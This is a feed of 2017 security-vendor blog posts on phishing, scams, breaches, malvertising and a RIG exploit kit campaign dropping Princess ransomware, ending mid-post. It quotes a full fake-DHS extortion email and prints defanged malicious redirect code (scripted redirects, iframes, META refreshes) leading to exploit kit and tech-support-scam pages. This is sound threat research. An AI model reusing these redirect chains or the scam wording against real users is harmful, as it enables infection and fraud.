Techie Feeds

Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malwarebytes - Tue, 09/12/2017 - 17:24

Phishing continues to be a criminals’ favorite for harvesting user credentials with more or less sophisticated social engineering tricks. In this post, we take a look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message but also to external members via email.

What makes this campaign interesting is the abuse of long standing and trusted accounts that were hacked, including Premium membership accounts that have the ability to contact other LinkedIn users (even if they aren’t a direct contact) via the InMail feature. The fraudulent message includes a reference to a shared document and a link that redirects to a phishing site for Gmail and other email providers which require potential victims to log in.

Those who proceed will have their username, password, and phone number stolen but won’t realize they were duped right away. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted and existing contact, although the time stamp is showing 12:17 AM, which is perhaps one of the red flags to be noted. The message talks about a shared Google Doc and gives a link to it, via the Ow.ly URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both ow.ly and a free hosting provider (gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish

Phishing for email credentials

This particular page is built as a Gmail phish, but will also ask for Yahoo or AOL user names and passwords. The main page is followed by an additional request for a phone number or secondary email address and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content

InMail

Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. As per LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This is an interesting aspect since it opens up the scope of the attack not only to the compromised account’s own contacts but also to other users.

This email was sent via LinkedIn and had a custom ‘Security Footer‘. LinkedIn will send messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from “phishing” email messages“, although it does point it out that it is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not. The same can be said for phishing pages that use HTTPS – which is the case here – making content delivery secure but the content itself fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim’s reputation so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite‘s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new – we have seen hacked Skype or Facebook accounts send spam – but it reminds us of how much more difficult it is to block malicious activity when it comes from long standing and trusted user accounts, not to mention work acquaintances or relatives. This also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, you should immediately review its settings to change your password and enable two-step verification (instructions here). Additionally, you can post a quick update on your timeline that lets your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document http://ow.ly/[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN dgocs[.]gdk.mx/new/index.php dgocs[.]gdk.mx/new/index.php?i=1 cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:

docs.google.com/document/d/13qUEngtHuKjtvGoPaMl3x6cEnT2oO6lSWOccM-PkXKk/edit

The post Compromised LinkedIn accounts used to send phishing links via private message and InMail appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 4 – September 10)

Malwarebytes - Mon, 09/11/2017 - 19:53

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPs, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.

Elsewhere:

Consumer News Business News

Stay safe!

Malwarebytes Lab Team

 

 

The post A week in security (September 4 – September 10) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake DHS email – “Give us $350 in the next 24 hours”

Malwarebytes - Fri, 09/08/2017 - 15:00

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):

Attention:

You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.

 

Christopher Boyd

 

The post Fake DHS email – “Give us $350 in the next 24 hours” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax breach: What you need to know

Malwarebytes - Fri, 09/08/2017 - 07:02

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.

Equifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to equifaxsecurity2017.com, a website Equifax has just set up.

The post Equifax breach: What you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google reminds website owners to move to HTTPS before October deadline

Malwarebytes - Thu, 09/07/2017 - 15:36

With the release of Chrome v62 in less than 3 months, Google will begin marking non-HTTPS pages with text input fields—like contact forms and search bars—and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. The company has started sending out warning emails to web owners in August as a follow-up to an announcement by Emily Schechter, Product Manager of Chrome Security Team, back in April.

Google began marking sites in Chrome v56, which was issued in January of this year. They targeted HTTP sites that collect user passwords and credit card details.

For owners to secure the information being shared among their visitors and their web server, they must start incorporating an SSL certificate. Failing to do this is risky for both parties: sites that allow the sending of information in clear text may also allow its exposure through the Internet.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended to separate phishing sites from legitimate ones with the marking of insecure sites, as Help Net Security noted in an article. Unfortunately, the introduction of new browser versions capable of flagging sites also promptly introduced more phishing sites using HTTPS. We’ve been seeing examples of this in the wild, as well, the latest of which was an Apple phishing campaign.

Discerning phishing pages from the real ones has become more challenging than ever. This is why it’s important for users to familiarize themselves with other signs that they might be on a phishing page apart from the lack of SSL certificates. Fortunately, users don’t have to look far from the address bar when they want to double-check that they’re on the right page before entering their credentials or banking details. Keep in mind the following when scrutinizing URLs and other elements around it:

  • Look for letters in the URL that may have been made to look like another letter or number, or there may be additional letters or numbers in the URL. For example, examplewebsite.com may appear as examplevvebsite.com—Catch that? The double ‘v’ together makes it look like the letter ‘w.’ This is an example of typosquatting. Here’s another example: examp1ewebsite.com—the ‘l’ in “example” is actually the number one.
  • Look for an Extended Validation Certificate (EV SSL). You know that a trusted website has this when you see a company name beside the URL, as you can see from the below UK Paypal address. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.

Other related posts:

 

The Malwarebytes Labs

The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: False positives

Malwarebytes - Thu, 09/07/2017 - 15:00
What are false positives?

False positive, which is sometimes written as f/p, is an expression commonly used in cybersecurity to denote that a file or setting has been flagged as malicious when it’s not.

In statistics, false positives are called Type I errors, because they check for a particular condition and wrongly give an affirmative (positive) decision. The opposite of this is false negative, or Type II error, which checks for a particular condition is not true when, in fact, it is. In this blog post, we will focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses.” So “misses” are malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example rule for a heuristic detection could be this: if this file claims to be from Microsoft, but it is not signed with the Microsoft certificate, then we assume the file has malicious intentions. A false positive could occur in the rare case that Microsoft forgot to sign the file.

One detection vector in spotting the behavior of ransomware is if a program starts deleting shadow copies. Some ransomware families do this to ensure the victim has no backups. But you can imagine a cleanup utility that deletes old shadow copies, which could possibly be flagged as displaying malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance of trying to cover as many of them as possible without triggering any false positives and, understandably, this can go wrong sometimes.

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

But history has also brought us deliberate false positives as a way to test if an anti-malware software is using detections made by their competitors.

Summary

False positives are alarms for non-specific files or behavior that is flagged as malicious, while in fact there were no bad intentions present. They are caused by rules that try to catch as many malicious events as possible, which sometimes fail by picking up something legitimate.

 

Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Nigerian scams without the Nigerians

Malwarebytes - Wed, 09/06/2017 - 23:00

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This is actually more common via SMS, presumably due to limited mobile spam tools. The subject line will reference upcoming training for generic business skills like project management, book keeping, or HR.

项目领导力总结—8月23-24日学吧 《项目领导力》

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying around vague business topics and are so common that almost any Chinese internet user is likely to see one eventually. The provided mobile number doesn’t show any results besides more spam and the QQ isn’t registered to any notable groups. Generally, the accounts associated with these emails are used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He’s referencing a file that has a detailed agenda, as well as registration info. He also wants our Weixin, so that we can “maintain a long-term relationship.”

The attached, clean file includes a “registration form” requiring the following:

 

 

  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam begins to edge closer to malicious. Scammers will take the target’s money, and PII as well for use in further scams. Should a user actually fill this out, they will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.

Conclusion

So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook worries: I didn’t post that

Malwarebytes - Wed, 09/06/2017 - 15:00

It is my assumption that most Facebook users don’t look at their own profile often. With your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The feeling of disorientation you get when you find something you are sure you didn’t post will be even worse if you notice that supposed messages have been sent from your Facebook Messenger account that you know you never sent. All in all, there might be some discrepancies between what you did and what actually shows up and that’s what this blog post is all about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it the past and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember the “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible there is an active script (or program) that uses your credentials when you have Facebook opened in your browser. The script does not need to log in, but simply makes use of the fact that you already did log in. It doesn’t matter whether you did that actively or whether you relied on a cookie set in an earlier session.

These scripts can be hiding in your browser cache or in the shortcut that you use to open Facebook. You can find localized and browser-specific help on clearing your cache on this Facebook Help page for several browsers. You can circumvent using your shortcuts if you suspect they have been altered by typing facebook.com in your browsers address bar. Once you are sure the shortcuts have been altered, you can find methods on how to clean your browser shortcuts on our forums.

Browser extensions could be responsible for this similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.
Stolen credentials

I’m posting about this as the last option for a reason as the advice that we will give you here does not only apply to the cases where you know that someone or something you didn’t authorize posted on your behalf. If you have experienced or suspected that something or someone has been posting without your knowledge, or one of the other options (scripts, rogue apps), we recommend that you change your password and enable 2FA, if you haven’t already. Even if you have no idea who might have been responsible, we recommend you lock them out before they abuse their access to your account even further. We also recommend doing this even if you found out which app or other method was used, and even if you successfully removed the culprit, keep in mind that the same app or script might have harvested your login credentials and sent them to the threat actors.

Summary

What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.

 

Other articles that might interest you:

 

Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Expired domain names and malvertising

Malwarebytes - Tue, 09/05/2017 - 15:00

In Q1 and Q2 of 2017, we noticed a sharp decline in drive-by downloads coming from compromised websites. The campaigns of the past are either gone (Pseudo Darkleech) or have changed focus (EITest using social engineering techniques).

Malvertising – which has remained steady and is currently the main driving force behind some of the most common malware and scam distribution operations- not only stems from various publishers but also from ‘abandoned’ websites. Those related domains once served a legitimate purpose but were never renewed by their owners and fell into the hands of actors looking to make a quick profit using questionable practices.

In this post, we take a look at how malicious redirections from expired domains work and what kind of traffic they lead to.

The life, death, and resurrection of a domain name

Most issues when it comes to web security don’t usually come from the platforms themselves but from the people that run them or from properties that have simply been relinquished. The folks over at Sucuri have written about this extensively and in a recent post, they showed how expired domains and outdated plugins in popular CMS were a deadly mix, resulting in malicious redirects.

Here is an example of a website, oezelotel[.]com first registered to denizduezguen@yahoo.de on 03/10/2014, that once was advertising various hotels, was wiped in 2016, and eventually got parked as its domain name registration was never renewed.

Figure 1: Evolution of a website over time and its eventual expired domain name

New owner, clear motive

A historical whois on the parked domain courtesy of Hyas’ Comox shows that on June 4, 2017, the domain name changed hands from its original owner to domainmanagers@outlook.com. This is also when the site changed hosting (moving from a Germany based server to a US one) and began exhibiting its malicious behavior.

A cursory review of some other properties owned by the same registrant indicates a penchant for going after expired domains and monetizing them via dubious ad networks. DomainTools has over 23 K records belonging to that same email address.

Malvertising roulette

You might think a non-existent site is harmless but this couldn’t be further from the truth. Abandoned or forgotten domains are often registered and ‘parked’ to generate low-quality traffic (i.e. spammy links) as described in yet another blog post from Sucuri, and it is a real – lucrative – business model.

We observed different types of traffic, ranging from bogus surveys to more nefarious activity such as drive-by attacks and tech support scams, based on a visitor’s user agent. Note that the following examples did not require users to click on any link, the simple fact of visiting the site triggered an automatic redirection.

RIG EK Flow:

Figure 2: RIG exploit kit infection chain via the Fobos campaign that delivers the Bunitu Trojan.

oezelotel[.]com (parked site) -> xml1.limeclick[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://xml1.limeclick[.]com /click?i=SXRzS*SmiP4_0';</script></body></html> xml1.limeclick[.]com -> bingfreegames3[.]info <iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ ssl/index.php?ps=49506017476' width='313' height='313' dir='0' ></iframe> 212kjhguihkhbvd[.]cf -> 188.225.27.234 (RIG EK landing) <iframe id="91130118" width=278 double="1" height=278 src= "http://188.225.27[.]234/?NTkwNTc2&mano={redacted}" > </iframe> Tech Support Scam (TSS) flow:

Figure 3: Redirection to tech support scam via blobar[.org]

oezelotel[.]com (parked site) -> bougainvillaeabuffeting[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://bougainvillaeabuffeting[.]com/d/ r5t9b73131?rtb={redacted}&subid=oezelotel.com';</script></body></html> bougainvillaeabuffeting[.]com -> blobar[.]org document.write('<META http-equiv="refresh" content="0;url='+u+'">'); </SCRIPT><NOSCRIPT><META http-equiv="refresh" content="0;url= https://blobar.org/d/0&rtb={redacted}&subid=oezelotel.com&r= http%3A%2F%2Foezelotel.com%2F"></NOSCRIPT> <META name="referrer" content="no-referrer"> blobar[.]org -> www.alrtsyscalling[.]cf (TSS landing) Location: https://www.alrtsyscalling[.]cf/call-microsoft-support-at-1-855-633-1666

Figure 4: Browser locker serving a tech support scam page (IP address is hard coded in picture)

Traffic and user targeting

These days it seems irrelevant how malicious actors get their leads, so long as they are genuine users they can expose to malware or scams. An advantage of using ad networks and malvertising is that a lot of the filtering can be handled throughout the distribution chain, with remarkable efficiency, compared to server side checks on compromised sites.

Parked domains are one of many scenarios of hijacking traffic and monetizing it. While those practices raise eyebrows, are they actually illegal? Is it something that domain name registrars should enforce or ban? Those are interesting questions worth debating.

Malwarebytes blocks a lot of domains associated with malvertising as well as drive-by download attempts. Because we are witnessing more and more social engineering attacks, we highly recommend you spread the word about one of the most common scams today, the tech support scam.

The post Expired domain names and malvertising appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 28 – September 3)

Malwarebytes - Mon, 09/04/2017 - 17:00

Last week, we looked at what actions Kronos can perform in the final installment of a 2-part post. We also dived into Locky, again, a ransomware that just made a comeback, and found that its latest variant (as of this writing) has anti-sandboxing capabilities. This means that once Locky has determined that it’s residing in a virtual machine, it will not perform to its full functionality.

Our researchers also talked about a new 419 spam, malware vaccination tricks, malvertising, and insider threats.

Lastly, Senior Security Researcher Jérôme Segura uncovered a new RIG exploit kit campaign that drops the PrincessLocker ransomware via drive-by download.

Mobile Menace Monday: Implications of Google Play Protect

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Scammers Already Taking Advantage Of Hurricane Harvey, Registering Domains. “The Better Business Bureau said it has already seen sketchy crowdfunding efforts and expects the coming months to see the usual flood of ‘storm chasers’ — ranging from legitimate contractors looking for business to scammers attempting to take advantage of those who’ve already been victimized by the storm. In addition, US-CERT is warning users “to remain vigilant for malicious cyber activity seeking to capitalize on interest in Hurricane Harvey.” (Source: Cyber in Sight)
  • IRS Warns of Emails Spreading Ransomware. “The Internal Revenue Service (IRS) is warning US citizens of a new phishing scheme that poses as official IRS communications in the hopes that victims access a link, download a file, and hopefully get infected with ransomware.” (Source: Bleeping Computer)
  • USB Malware Implicated in Fileless Attacks. “In early August we discussed a case where a backdoor was being installed filelessly onto a target system using a script that abused various legitimate functions. At the time, we did not know how the threat arrived onto the target machine. We speculated that it was either downloaded by users or dropped by other malware. We recently learned the exact arrival method of this backdoor. As it turned out, we were wrong: it was neither dropped nor downloaded. Instead, it arrived via USB flash disks.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
  • FDA Approves Firmware Fix for St Jude Pacemakers. “Abbott-owned St Jude Medical was at the center of a legal storm last year after suing security firm MedSec and short seller Muddy Waters for publishing what it claimed to be false info about bugs in its equipment. It argued this strategy helped them make money off the stock market when shares in St Jude inevitably fell on the news. However, since then the firm has been forced to address some of the issues highlighted by MedSec by releasing security fixes for some products, as it did in January.” (Source: InfoSecurity Magazine)
  • Attackers Exploited Instagram API Bug To Access Users’ Contact Info. “Instagram has confirmed that ‘one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information — specifically email address and phone number — by exploiting a bug in an Instagram API.’ Apparently, no account passwords were exposed.” (Source: Help Net Security)
  • Phishing Emails Undetected by 97 Percent of People. “Today, phishing emails are behind 97 percent of cyber attacks, yet recent research reveals 97 percent of people cannot identify those phishing scams, putting the companies they work for at risk. In fact, out of 5,000 emails, one of them is likely to be a phishing email that causes damage. Victims may not know they’ve become one for up to a year.” (Source: Inside Counsel)
  • New Authentication Methods Help Companies To Ditch Passwords. “Most people now recognize that passwords alone are flawed as a means of securing systems. The problem is that there are lots of options when it comes to finding a better way of doing things. Access control specialist SecureAuth is helping the move towards a passwordless world with the introduction of additional multi-factor authentication (MFA) methods, including Link-to-Accept via SMS or email, and YubiKey, the FIDO Universal Second-Factor (U2F) security key by Yubico.” (Source: Beta News)
Latest updates for Businesses
  • Strains Of Mutant Malware Increasingly Evading Anti-Virus To Rob Bank Accounts, Says Akouto. “An analysis of recent attacks finds a sharp increase in the use of new strains of malware capable of bypassing traditional anti-virus according to cybersecurity experts from Akouto. The majority of the analyzed attacks aimed to harvest confidential information and steal money through online banking fraud.” (Source: Payment Week)
  • Ransomware is Going More Corporate, Less Consumer. “Ransomware deployed as worms tends to hit companies far harder than consumers, given that malicious malware can shoot through corporate networks with great speed. Consumers, on the other hand, are usually not connected to a network. As a result, WannaCry and Petya helped push corporations to account for 42% of all ransomware incidents in the first half of the year, compared to 30% of ransomware incidents for all of last year and 29% in 2015, according to the report.” (Source: Dark Reading)
  • SMBs Beware! This Is How Automated Software Updates Spread Malware. “You’re surfing the web, and suddenly a pop-up appears asking you to update a piece of software on your computer. Today, we should all be canny enough to hesitate before clicking ‘install’. We know that there is a good chance that this is malware and that what we will be downloading could put the future of our business at risk. However, what happens when we’re not given a choice? Can we always trust the seemingly routine automatic updates our computers receive, even when their certificate seems to be OK? The answer is no.” (Source: Computing.Co.UK)
  • Hacking Retail Gift Cards Remains Scarily Easy. “After years of examining the retail gift card industry following that initial discovery, Caput plans to present his findings at the Toorcon hacker conference this weekend. They include all-too-simple tricks that hackers can use to determine gift card numbers and drain money from them, even before the legitimate holder of the card ever has a chance to use them. While some of those methods have been semi-public for years, and some retailers have fixed their security flaws, a disturbing fraction of targets remain wide open to gift card hacking schemes, Caput says. And as analysis of the recently defunct dark web marketplace AlphaBay shows, actual criminals have made prolific use of those schemes too.” (Source: Wired)
  • Payment security: What are the biggest challenges? “With cybercrime on the increase, payment card security is increasingly a focus for companies and consumers alike. The Payment Card Industry Data Security Standard (PCI DSS) is there to help businesses that take card payments protect their payment systems from breaches and theft of cardholder data. The findings from the Verizon 2017 Payment Security Report (2017 PSR) demonstrate a link between organizations being compliant with the standard, and their ability to defend themselves against cyberattacks.” (Source: Help Net Security)

Safe surfing, everyone!

 

The Malwarebytes Labs Team

The post A week in security (August 28 – September 3) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Insider threats in your work inbox

Malwarebytes - Fri, 09/01/2017 - 16:52

Recently, our friends at Barracuda found a new phishing campaign that banks on the popularity of cloud services used in most businesses, such as Microsoft Office 365.

According to their blog post, this latest scheme takes advantage of the natural trust employees place on messages they receive from colleagues using the correct email address. Dear reader, this campaign is beyond impostor email or business email compromise (BEC). Barracuda is calling it the ‘new insider threat.’

BEC phishing campaigns usually originate outside the target organization. The threat actor creates an email address that may appear like the real thing, just like what we’ve seen here, and then uses it to convince someone in the organization to wire money their way. If a threat actor successfully infiltrates an organization’s email platform on the cloud, then the threat becomes something else. The threat actor has become an identity thief and an insider who is now the biggest threat to any organization. At that point, the possibilities of abuse are endless.

Businesses can combat this new attack by continuous education and awareness efforts. It also pays to add multifactor authentication for additional ways employees can verify their identities before being allowed to access their work emails.

 

The Malwarebytes Labs Team

The post Insider threats in your work inbox appeared first on Malwarebytes Labs.

Categories: Techie Feeds

RIG exploit kit distributes Princess ransomware

Malwarebytes - Thu, 08/31/2017 - 20:04

We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.

We had analyzed the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber’s onion page, the actual code was much different. A new payment page seemed to have been seen in underground forums and is now being used with attacks in the wild.

From hacked site to RIG EK

We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.

Yet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known “Seamless gate” which has been dropping copious amounts of the Ramnit Trojan.

The ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer (CVE-2013-2551CVE-2014-6332, CVE-2015-2419, CVE-2016-0189) or Flash Player (CVE-2015-8651) vulnerabilities.

Princess ransomware

Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called _USE_TO_REPAIR_[a-zA-Z0-9].html where [a-zA-Z0-9] is a random identifier.

The payment page can be accessed via several provided links including a ‘.onion‘ one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.

Down but still kicking

